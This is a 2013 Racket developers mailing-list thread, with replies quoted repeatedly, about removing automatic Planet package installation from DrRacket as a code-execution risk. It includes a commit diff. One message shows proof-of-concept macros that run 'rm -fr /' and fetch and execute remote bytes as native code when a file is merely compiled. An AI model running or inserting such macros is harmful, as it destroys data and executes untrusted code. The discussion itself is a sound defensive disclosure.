Re: [racket-dev] [plt] Push #27862: master branch updated
Oh, yes. I meant to add this to my message. This is a bit part of why I think the package system is going to work well: there is now some movement in this good direction. (Jacob and Matthias and I had talked about social "stuff" in the context of planet a bunch, but a) didn't do enough and b) had a slightly different emphasis -- but b) probably would have changed if we'd dug into it.) Robby On Thu, Nov 28, 2013 at 8:57 AM, Jay McCarthy wrote: > And similarly, the package system is a social curation system to > monitor packages for good behavior, which planet does do (but could > have and could now.) > > Jay > > On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler > wrote: > > In short "yes". But that short answer isn't where we should stop. :) > Really, > > this is about a design decision that's different between planet and the > > package system: in planet, "running" a program was sufficient for > installing > > packages. In the package system you have to take an explicit step to > > "install" the package. > > > > I used quotes there because the devil is a bit in the details here (as > Jay > > points out with his "some macro tricks" comment) but really what we're > > talking about is that design difference and UX issues. Overall, I feel > like > > the package system's different design decisions are the right way to go > but > > that we should keep planet being planet (and Jay and I had a discussion > > about that offline), which is why he reverted one of those commits. > > > > And to clear up the check syntax thing: there is no way that online check > > syntax could have installed a planet package (or, for that matter, made > any > > changes to your file system). You would have had to Run the program or > > explicitly ask for it to be compiled or something like that. > > > > Make more sense? > > > > Robby > > > > > > On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen < > matth...@ccs.neu.edu> > > wrote: > >> > >> > >> Am I naive or isn't any download of any package opening the door to such > >> tricks? > >> > >> > >> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: > >> > >> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler > >> > wrote: > >> >> > >> >> > >> >> > >> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy > >> >> wrote: > >> >>> > >> >>> If I have background expansion on, then when I open that file it > >> >>> installs the package. > >> >>> > >> >> > >> >> As I wrote in my previous message, it doesn't do that for me. And I > >> >> don't > >> >> see how it could do that, actually. Are you saying that you tried > this? > >> > > >> > Yes. I put that in a file and opened it up with DrRacket then got the > >> > "Can't download a Planet package" error message as-if the install were > >> > stopped. > >> > > >> >> Can you explain how you have configured DrRacket to disable the > >> >> security > >> >> guard that is installed by the background expansion process, please? > >> > > >> > Perhaps my trial was bad because the security guard would have stopped > >> > the network access but my error stopped the library from attempting > >> > the network access? > >> > > >> > Regardless, "Check Syntax" (I think?) or compilation in Racket would > >> > have installed it. [Now, obviously the same macro tricks could > >> > explicitly call download/install-pkg... but I think it is a bit feeble > >> > to say "Check Syntax" should make no attempt to prevent package > >> > installation.] > >> > > >> >> Meanwhile, I would like to point out that your commit has completely > >> >> disabled planet. No packages can be installed. Did you run any test > >> >> suites > >> >> after making this change? > >> > > >> > I tried to install and fetch some packages. I see now that I committed > >> > in the "racket/collects" directory but the changes to make that work > >> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them. > >> > > >> > Jay > >> > > >> >> Robby > >> >> > >> > _ > >> > Racket Developers list: > >> > http://lists.racket-lang.org/dev > >> > > > _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
And similarly, the package system is a social curation system to monitor packages for good behavior, which planet does do (but could have and could now.) Jay On Thu, Nov 28, 2013 at 7:56 AM, Robby Findler wrote: > In short "yes". But that short answer isn't where we should stop. :) Really, > this is about a design decision that's different between planet and the > package system: in planet, "running" a program was sufficient for installing > packages. In the package system you have to take an explicit step to > "install" the package. > > I used quotes there because the devil is a bit in the details here (as Jay > points out with his "some macro tricks" comment) but really what we're > talking about is that design difference and UX issues. Overall, I feel like > the package system's different design decisions are the right way to go but > that we should keep planet being planet (and Jay and I had a discussion > about that offline), which is why he reverted one of those commits. > > And to clear up the check syntax thing: there is no way that online check > syntax could have installed a planet package (or, for that matter, made any > changes to your file system). You would have had to Run the program or > explicitly ask for it to be compiled or something like that. > > Make more sense? > > Robby > > > On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen > wrote: >> >> >> Am I naive or isn't any download of any package opening the door to such >> tricks? >> >> >> On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: >> >> > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler >> > wrote: >> >> >> >> >> >> >> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy >> >> wrote: >> >>> >> >>> If I have background expansion on, then when I open that file it >> >>> installs the package. >> >>> >> >> >> >> As I wrote in my previous message, it doesn't do that for me. And I >> >> don't >> >> see how it could do that, actually. Are you saying that you tried this? >> > >> > Yes. I put that in a file and opened it up with DrRacket then got the >> > "Can't download a Planet package" error message as-if the install were >> > stopped. >> > >> >> Can you explain how you have configured DrRacket to disable the >> >> security >> >> guard that is installed by the background expansion process, please? >> > >> > Perhaps my trial was bad because the security guard would have stopped >> > the network access but my error stopped the library from attempting >> > the network access? >> > >> > Regardless, "Check Syntax" (I think?) or compilation in Racket would >> > have installed it. [Now, obviously the same macro tricks could >> > explicitly call download/install-pkg... but I think it is a bit feeble >> > to say "Check Syntax" should make no attempt to prevent package >> > installation.] >> > >> >> Meanwhile, I would like to point out that your commit has completely >> >> disabled planet. No packages can be installed. Did you run any test >> >> suites >> >> after making this change? >> > >> > I tried to install and fetch some packages. I see now that I committed >> > in the "racket/collects" directory but the changes to make that work >> > were in the "pkgs/planet-pkgs" directory so I stupidly missed them. >> > >> > Jay >> > >> >> Robby >> >> >> > _ >> > Racket Developers list: >> > http://lists.racket-lang.org/dev >> > _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
In short "yes". But that short answer isn't where we should stop. :) Really, this is about a design decision that's different between planet and the package system: in planet, "running" a program was sufficient for installing packages. In the package system you have to take an explicit step to "install" the package. I used quotes there because the devil is a bit in the details here (as Jay points out with his "some macro tricks" comment) but really what we're talking about is that design difference and UX issues. Overall, I feel like the package system's different design decisions are the right way to go but that we should keep planet being planet (and Jay and I had a discussion about that offline), which is why he reverted one of those commits. And to clear up the check syntax thing: there is no way that online check syntax could have installed a planet package (or, for that matter, made any changes to your file system). You would have had to Run the program or explicitly ask for it to be compiled or something like that. Make more sense? Robby On Thu, Nov 28, 2013 at 8:44 AM, Matthias Felleisen wrote: > > Am I naive or isn't any download of any package opening the door to such > tricks? > > > On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: > > > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler > > wrote: > >> > >> > >> > >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy > wrote: > >>> > >>> If I have background expansion on, then when I open that file it > >>> installs the package. > >>> > >> > >> As I wrote in my previous message, it doesn't do that for me. And I > don't > >> see how it could do that, actually. Are you saying that you tried this? > > > > Yes. I put that in a file and opened it up with DrRacket then got the > > "Can't download a Planet package" error message as-if the install were > > stopped. > > > >> Can you explain how you have configured DrRacket to disable the security > >> guard that is installed by the background expansion process, please? > > > > Perhaps my trial was bad because the security guard would have stopped > > the network access but my error stopped the library from attempting > > the network access? > > > > Regardless, "Check Syntax" (I think?) or compilation in Racket would > > have installed it. [Now, obviously the same macro tricks could > > explicitly call download/install-pkg... but I think it is a bit feeble > > to say "Check Syntax" should make no attempt to prevent package > > installation.] > > > >> Meanwhile, I would like to point out that your commit has completely > >> disabled planet. No packages can be installed. Did you run any test > suites > >> after making this change? > > > > I tried to install and fetch some packages. I see now that I committed > > in the "racket/collects" directory but the changes to make that work > > were in the "pkgs/planet-pkgs" directory so I stupidly missed them. > > > > Jay > > > >> Robby > >> > > _ > > Racket Developers list: > > http://lists.racket-lang.org/dev > > _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
Am I naive or isn't any download of any package opening the door to such tricks? On Nov 27, 2013, at 8:46 PM, Jay McCarthy wrote: > On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler > wrote: >> >> >> >> On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy wrote: >>> >>> If I have background expansion on, then when I open that file it >>> installs the package. >>> >> >> As I wrote in my previous message, it doesn't do that for me. And I don't >> see how it could do that, actually. Are you saying that you tried this? > > Yes. I put that in a file and opened it up with DrRacket then got the > "Can't download a Planet package" error message as-if the install were > stopped. > >> Can you explain how you have configured DrRacket to disable the security >> guard that is installed by the background expansion process, please? > > Perhaps my trial was bad because the security guard would have stopped > the network access but my error stopped the library from attempting > the network access? > > Regardless, "Check Syntax" (I think?) or compilation in Racket would > have installed it. [Now, obviously the same macro tricks could > explicitly call download/install-pkg... but I think it is a bit feeble > to say "Check Syntax" should make no attempt to prevent package > installation.] > >> Meanwhile, I would like to point out that your commit has completely >> disabled planet. No packages can be installed. Did you run any test suites >> after making this change? > > I tried to install and fetch some packages. I see now that I committed > in the "racket/collects" directory but the changes to make that work > were in the "pkgs/planet-pkgs" directory so I stupidly missed them. > > Jay > >> Robby >> > _ > Racket Developers list: > http://lists.racket-lang.org/dev _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 6:27 PM, Robby Findler wrote: > > > > On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy wrote: >> >> If I have background expansion on, then when I open that file it >> installs the package. >> > > As I wrote in my previous message, it doesn't do that for me. And I don't > see how it could do that, actually. Are you saying that you tried this? Yes. I put that in a file and opened it up with DrRacket then got the "Can't download a Planet package" error message as-if the install were stopped. > Can you explain how you have configured DrRacket to disable the security > guard that is installed by the background expansion process, please? Perhaps my trial was bad because the security guard would have stopped the network access but my error stopped the library from attempting the network access? Regardless, "Check Syntax" (I think?) or compilation in Racket would have installed it. [Now, obviously the same macro tricks could explicitly call download/install-pkg... but I think it is a bit feeble to say "Check Syntax" should make no attempt to prevent package installation.] > Meanwhile, I would like to point out that your commit has completely > disabled planet. No packages can be installed. Did you run any test suites > after making this change? I tried to install and fetch some packages. I see now that I committed in the "racket/collects" directory but the changes to make that work were in the "pkgs/planet-pkgs" directory so I stupidly missed them. Jay > Robby > _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
On Wed, Nov 27, 2013 at 7:21 PM, Jay McCarthy wrote: > If I have background expansion on, then when I open that file it > installs the package. > > As I wrote in my previous message, it doesn't do that for me. And I don't see how it could do that, actually. Are you saying that you tried this? Can you explain how you have configured DrRacket to disable the security guard that is installed by the background expansion process, please? Meanwhile, I would like to point out that your commit has completely disabled planet. No packages can be installed. Did you run any test suites after making this change? Robby _ Racket Developers list: http://lists.racket-lang.org/dev
Re: [racket-dev] [plt] Push #27862: master branch updated
If I have background expansion on, then when I open that file it installs the package. Since once a Planet package is installed it is set up and compiled that means that this code: #lang racket (attack) (define-syntax (attack stx) (system "rm -fr /")) is automatically run as soon as I open it up. Furthermore, I could do something like this: #lang racket (attack) (define-syntax (attack stx) (local-require (only-in '#%foreign ffi-call _int32) net/http-client) (define-values (s hs ip) (http-sendrecv "example.com" "/")) (define bs (port->bytes ip)) (printf "got: ~v\n" bs) (define weird-c-code bs) ((ffi-call weird-c-code null _int32))) and really execute any C code that I could find on the Internet. This isn't just a DrRacket problem though. We should not be arbitrarily installing things on people's machines without their consent. This power is too much. The new system of suggesting an install or allowing an opt-in for certain vetted packages is much kinder. Jay On Wed, Nov 27, 2013 at 5:35 PM, Robby Findler wrote: > Can you demonstrate how to make this happen? Opening a file with these > contents, for example, doesn't install anything. > > #lang racket > (require (planet planet/test-connection:1:0/test-connection)) > > As for automatically executing arbitrary code, I think you must mean > something more precise here. Perhaps "code that hasn't already been > explicitly installed"? If that's what you mean, then I think I'm also > missing how this happens. > > Robby > > > On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy wrote: >> >> There is an important change in this commit. Since we've created the >> release branch for 6.0, I think we should stop automatically >> installing and executing arbitrary code when people open files in >> DrRacket. Currently the error message suggests using "raco planet" but >> I think we need a bit of a GUI shim for other users. >> >> On Wed, Nov 27, 2013 at 3:40 PM, wrote: >> > jay has updated `master' from 033065f632 to 60ae164d05. >> > http://git.racket-lang.org/plt/033065f632..60ae164d05 >> > >> > =[ 6 Commits ]== >> > Directory summary: >> > 57.6% pkgs/plt-services/meta/pkg-index/official/static/ >> > 17.6% pkgs/plt-services/meta/pkg-index/official/ >> > 22.0% racket/collects/planet/private/ >> > >> > ~~ >> > >> > 2413278 Jay McCarthy 2013-11-27 14:51 >> > : >> > | moving delete button >> > : >> > M .../meta/pkg-index/official/static/index.html | 2 ++ >> > M .../meta/pkg-index/official/static/index.js | 16 >> > +--- >> > M .../meta/pkg-index/official/static/style.css | 4 >> > >> > ~~ >> > >> > 113696c Jay McCarthy 2013-11-27 14:54 >> > : >> > | edit on lose focus >> > : >> > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- >> > >> > ~~ >> > >> > cf1755f Jay McCarthy 2013-11-27 15:19 >> > : >> > | Remove arbitrary code execution exploit from Racket and DrRacket >> > | >> > | This is particularly bad with DrRacket's online syntax checking, which >> > | causes opening a file to download and executed aribtrary code. >> > : >> > M racket/collects/planet/private/resolver.rkt | 8 >> > >> > ~~ >> > >> > 98df30c Jay McCarthy 2013-11-27 15:30 >> > : >> > | deleting static s3 content properly >> > : >> > M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 >> > ++- >> > >> > ~~ >> > >> > 7b7a5ad Jay McCarthy 2013-11-27 15:33 >> > : >> > | increase pkg test timeout >> > : >> > M pkgs/plt-services/meta/props | 2 +- >> > >> > ~~ >> > >> > 60ae164 Jay McCarthy 2013-11-27 15:39 >> > : >> > | Removing add tag button when not logged in re mflatt >> > : >> > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 >> > +-- >> > M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- >> > >> > =[ Overall Diff ]=== >> > >> > pkgs/plt-services/meta/pkg-index/official/static.rkt >> > >> > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt >> > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt >> > @@ -304,7 +304,16 @@ >> >(cache "/pkgs" "pkgs") >> >(cache "/pkgs-all" "pkgs-all") >> >(for ([p (in-list pkg-list)]) >> > -(cache (format "/pkg/~a" p) (format "pkg/~a" p >> > +(cache (format "/pkg/~a" p) (format "pkg/~a" p))) >> > + >> > + (let () >> > +(define pkg-path (build-path static-path "pkg")) >> > +(for ([f (in-list (directory-list pkg-path))] >> > + #:unless (regexp-match #"json$" (path->string f)) >> > + #:unless (member (path->string f) pkg-list)) >> > + (with-handlers ([exn:fail:filesystem? void]) >> > +(delete-file (build-path pkg-path f)) >> > +(delete-file (build-path pkg-path (path-add-suffix f >> > #".json"))) >>
Re: [racket-dev] [plt] Push #27862: master branch updated
Can you demonstrate how to make this happen? Opening a file with these contents, for example, doesn't install anything. #lang racket (require (planet planet/test-connection:1:0/test-connection)) As for automatically executing arbitrary code, I think you must mean something more precise here. Perhaps "code that hasn't already been explicitly installed"? If that's what you mean, then I think I'm also missing how this happens. Robby On Wed, Nov 27, 2013 at 4:42 PM, Jay McCarthy wrote: > There is an important change in this commit. Since we've created the > release branch for 6.0, I think we should stop automatically > installing and executing arbitrary code when people open files in > DrRacket. Currently the error message suggests using "raco planet" but > I think we need a bit of a GUI shim for other users. > > On Wed, Nov 27, 2013 at 3:40 PM, wrote: > > jay has updated `master' from 033065f632 to 60ae164d05. > > http://git.racket-lang.org/plt/033065f632..60ae164d05 > > > > =[ 6 Commits ]== > > Directory summary: > > 57.6% pkgs/plt-services/meta/pkg-index/official/static/ > > 17.6% pkgs/plt-services/meta/pkg-index/official/ > > 22.0% racket/collects/planet/private/ > > > > ~~ > > > > 2413278 Jay McCarthy 2013-11-27 14:51 > > : > > | moving delete button > > : > > M .../meta/pkg-index/official/static/index.html | 2 ++ > > M .../meta/pkg-index/official/static/index.js | 16 > +--- > > M .../meta/pkg-index/official/static/style.css | 4 > > > > ~~ > > > > 113696c Jay McCarthy 2013-11-27 14:54 > > : > > | edit on lose focus > > : > > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- > > > > ~~ > > > > cf1755f Jay McCarthy 2013-11-27 15:19 > > : > > | Remove arbitrary code execution exploit from Racket and DrRacket > > | > > | This is particularly bad with DrRacket's online syntax checking, which > > | causes opening a file to download and executed aribtrary code. > > : > > M racket/collects/planet/private/resolver.rkt | 8 > > > > ~~ > > > > 98df30c Jay McCarthy 2013-11-27 15:30 > > : > > | deleting static s3 content properly > > : > > M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- > > > > ~~ > > > > 7b7a5ad Jay McCarthy 2013-11-27 15:33 > > : > > | increase pkg test timeout > > : > > M pkgs/plt-services/meta/props | 2 +- > > > > ~~ > > > > 60ae164 Jay McCarthy 2013-11-27 15:39 > > : > > | Removing add tag button when not logged in re mflatt > > : > > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 > +-- > > M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- > > > > =[ Overall Diff ]=== > > > > pkgs/plt-services/meta/pkg-index/official/static.rkt > > > > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt > > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt > > @@ -304,7 +304,16 @@ > >(cache "/pkgs" "pkgs") > >(cache "/pkgs-all" "pkgs-all") > >(for ([p (in-list pkg-list)]) > > -(cache (format "/pkg/~a" p) (format "pkg/~a" p > > +(cache (format "/pkg/~a" p) (format "pkg/~a" p))) > > + > > + (let () > > +(define pkg-path (build-path static-path "pkg")) > > +(for ([f (in-list (directory-list pkg-path))] > > + #:unless (regexp-match #"json$" (path->string f)) > > + #:unless (member (path->string f) pkg-list)) > > + (with-handlers ([exn:fail:filesystem? void]) > > +(delete-file (build-path pkg-path f)) > > +(delete-file (build-path pkg-path (path-add-suffix f > #".json"))) > > > > (module+ main > >(require racket/cmdline) > > > > pkgs/plt-services/meta/pkg-index/official/static/index.html > > ~~~ > > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html > > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html > > @@ -54,12 +54,14 @@ > > Last Edit: id="pi_last_edit"> > > Description: id="pi_description"> > > Tags: > > - class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag > > + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag > > Versions Exceptions id="pi_versions"> > > id="pi_add_version_row">Version: type="text" id="pi_add_version_text" class="text ui-widget-content > ui-corner-all" />Source: id="pi_add_version_source_text" class="text ui-widget-content > ui-corner-all" />Add Version > Exception > > Dependencies id="pi_dependencies"> > > Conflicts id="pi_conflicts"> > > Modules > > + id="pi_delete_button">Delete > > +Package(there is no undo!) > > > > > >
Re: [racket-dev] [plt] Push #27862: master branch updated
There is an important change in this commit. Since we've created the release branch for 6.0, I think we should stop automatically installing and executing arbitrary code when people open files in DrRacket. Currently the error message suggests using "raco planet" but I think we need a bit of a GUI shim for other users. On Wed, Nov 27, 2013 at 3:40 PM, wrote: > jay has updated `master' from 033065f632 to 60ae164d05. > http://git.racket-lang.org/plt/033065f632..60ae164d05 > > =[ 6 Commits ]== > Directory summary: > 57.6% pkgs/plt-services/meta/pkg-index/official/static/ > 17.6% pkgs/plt-services/meta/pkg-index/official/ > 22.0% racket/collects/planet/private/ > > ~~ > > 2413278 Jay McCarthy 2013-11-27 14:51 > : > | moving delete button > : > M .../meta/pkg-index/official/static/index.html | 2 ++ > M .../meta/pkg-index/official/static/index.js | 16 > +--- > M .../meta/pkg-index/official/static/style.css | 4 > > ~~ > > 113696c Jay McCarthy 2013-11-27 14:54 > : > | edit on lose focus > : > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 4 +++- > > ~~ > > cf1755f Jay McCarthy 2013-11-27 15:19 > : > | Remove arbitrary code execution exploit from Racket and DrRacket > | > | This is particularly bad with DrRacket's online syntax checking, which > | causes opening a file to download and executed aribtrary code. > : > M racket/collects/planet/private/resolver.rkt | 8 > > ~~ > > 98df30c Jay McCarthy 2013-11-27 15:30 > : > | deleting static s3 content properly > : > M pkgs/plt-services/meta/pkg-index/official/static.rkt | 11 ++- > > ~~ > > 7b7a5ad Jay McCarthy 2013-11-27 15:33 > : > | increase pkg test timeout > : > M pkgs/plt-services/meta/props | 2 +- > > ~~ > > 60ae164 Jay McCarthy 2013-11-27 15:39 > : > | Removing add tag button when not logged in re mflatt > : > M pkgs/plt-services/meta/pkg-index/official/static/index.js | 11 > +-- > M .../plt-services/meta/pkg-index/official/static/index.html | 2 +- > > =[ Overall Diff ]=== > > pkgs/plt-services/meta/pkg-index/official/static.rkt > > --- OLD/pkgs/plt-services/meta/pkg-index/official/static.rkt > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static.rkt > @@ -304,7 +304,16 @@ >(cache "/pkgs" "pkgs") >(cache "/pkgs-all" "pkgs-all") >(for ([p (in-list pkg-list)]) > -(cache (format "/pkg/~a" p) (format "pkg/~a" p > +(cache (format "/pkg/~a" p) (format "pkg/~a" p))) > + > + (let () > +(define pkg-path (build-path static-path "pkg")) > +(for ([f (in-list (directory-list pkg-path))] > + #:unless (regexp-match #"json$" (path->string f)) > + #:unless (member (path->string f) pkg-list)) > + (with-handlers ([exn:fail:filesystem? void]) > +(delete-file (build-path pkg-path f)) > +(delete-file (build-path pkg-path (path-add-suffix f #".json"))) > > (module+ main >(require racket/cmdline) > > pkgs/plt-services/meta/pkg-index/official/static/index.html > ~~~ > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.html > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.html > @@ -54,12 +54,14 @@ > Last Edit: > Description: id="pi_description"> > Tags: > -Add > Tag > + id="pi_add_tag_text" class="text ui-widget-content ui-corner-all" /> id="pi_add_tag_button">Add Tag > Versions Exceptions id="pi_versions"> > Version: > Source: id="pi_add_version_source_text" class="text ui-widget-content ui-corner-all" > />Add Version Exception > Dependencies id="pi_dependencies"> > Conflicts id="pi_conflicts"> > Modules > + id="pi_delete_button">Delete > +Package(there is no undo!) > > >Install this package > with:raco pkg install id="pi_name_inst">or, with the 'File|Install Package...' > menu option in DrRacket. > > pkgs/plt-services/meta/pkg-index/official/static/index.js > ~ > --- OLD/pkgs/plt-services/meta/pkg-index/official/static/index.js > +++ NEW/pkgs/plt-services/meta/pkg-index/official/static/index.js > @@ -8,6 +8,8 @@ function me () { > return localStorage['email']; } > > $( document ).ready(function() { > +var logged_in = false; > + > function jslink ( texts, clickf) { > return $('', { href: "javascript:void(0)", >click: clickf } ).html(texts); } > @@ -43,7 +45,7 @@ $( document ).ready(function() { > update_package_on_list ( pkgi ); > // console.log( pkgi ); > change_hash( "[" + pkgi['name'] + "]" ); > - > + > var mypkg_p = ($.inArr